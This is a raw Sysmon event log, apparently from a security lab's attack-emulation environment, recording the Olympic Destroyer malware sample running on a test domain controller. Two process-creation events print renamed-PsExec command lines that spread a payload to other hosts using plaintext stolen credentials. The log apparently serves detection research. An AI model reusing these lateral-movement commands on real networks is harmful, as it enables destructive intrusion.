10:57:21.591{C8EA50B7-1311-6216-3C06-000000003802}61486568C:\Windows\system32\conhost.exe{C8EA50B7-1311-6216-3A06-000000003802}5448C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292871Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:21.544{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-1311-6216-3C06-000000003802}6148C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000292870Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:21.544{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1311-6216-3C06-000000003802}6148C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292869Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:21.507{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-1311-6216-3B06-000000003802}6284C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000292868Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:21.491{C8EA50B7-12E6-6216-4B05-000000003802}67926936C:\Temp\olympic_destroyer.exe{C8EA50B7-1311-6216-3B06-000000003802}6284C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4a2f|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000292867Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:21.502{C8EA50B7-1311-6216-3B06-000000003802}6284C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\224.0.0.252 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000292866Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:21.491{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1311-6216-3B06-000000003802}6284C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000292865Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:21.491{C8EA50B7-1311-6216-3706-000000003802}4484C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000292864Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:21.491{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292863Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:21.491{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292862Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:21.491{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292861Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:21.491{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000292860Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:57:21.475{C8EA50B7-1311-6216-3706-000000003802}4484C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000292859Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:21.426{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-1311-6216-3906-000000003802}5268C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292858Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:21.426{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-1311-6216-3906-000000003802}5268C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292857Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:21.406{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-1311-6216-3A06-000000003802}5448C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000292856Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:21.406{C8EA50B7-12E6-6216-4B05-000000003802}67926924C:\Temp\olympic_destroyer.exe{C8EA50B7-1311-6216-3A06-000000003802}5448C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4a2f|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000292855Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:21.407{C8EA50B7-1311-6216-3A06-000000003802}5448C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\239.255.255.250 -u "TEQUILABOOMBOOM\janettedoe" -p "jane" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000292854Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:21.406{C8EA50B7-1311-6216-3906-000000003802}52681016C:\Windows\system32\conhost.exe{C8EA50B7-1311-6216-3706-000000003802}4484C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292853Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:21.406{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1311-6216-3A06-000000003802}5448C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000292852Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:21.391{C8EA50B7-1311-6216-3506-000000003802}5312C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000292851Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:21.391{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-1311-6216-3506-000000003802}5312C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292850Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:21.391{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-1311-6216-3506-000000003802}5312C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000292849Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:19.549{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53743-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 13241300x8000000000000000292848Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:57:21.375{C8EA50B7-1311-6216-3506-000000003802}5312C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000292847Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:21.375{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-1311-6216-3906-000000003802}5268C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000292846Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:21.360{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1311-6216-3906-000000003802}5268C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292845Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:21.325{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-1311-6216-3806-000000003802}6156C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292844Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:21.324{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-1311-6216-3806-000000003802}6156C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292843Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:21.307{C8EA50B7-1311-6216-3806-000000003802}61566352C:\Windows\system32\conhost.exe{C8EA50B7-1311-6216-3506-000000003802}5312C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292842Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:21.260{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-1311-6216-3806-000000003802}6156C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000292841Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:21.244{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1311-6216-3806-000000003802}6156C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292840Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:21.244{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292839Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:21.244{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292838Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:21.244{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292837Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 